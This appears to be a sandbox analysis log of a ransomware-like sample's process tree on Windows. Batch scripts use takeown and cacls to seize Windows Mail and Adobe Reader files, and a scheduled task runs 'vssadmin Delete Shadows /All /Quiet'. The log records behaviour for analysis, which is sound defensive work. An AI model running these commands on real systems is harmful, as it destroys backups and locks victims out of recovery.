C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui"3⤵PID:1052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:320
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:752
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:1740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "wabmig.exe" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "wabmig.exe" -nobanner4⤵PID:1104
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:300
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:1900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵
- Modifies file permissions
PID:1108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:1712
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:1204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "reviewers.gif" -nobanner3⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "reviewers.gif" -nobanner4⤵PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:2004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵PID:680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "server_lg.gif" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "server_lg.gif" -nobanner4⤵PID:1424
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:1656
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵PID:300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:1700
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:2044
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:1740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:1644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵PID:752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:320
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:2008
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F40AA1E0-BD81-4A5B-85EC-B0803A9B63C8} S-1-5-21-2329389628-4064185017-3901522362-1000:QSKGHMYQ\Admin:Interactive:[1]1⤵PID:960
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\3r13J0nw.bat"2⤵PID:1508
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:2024
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1648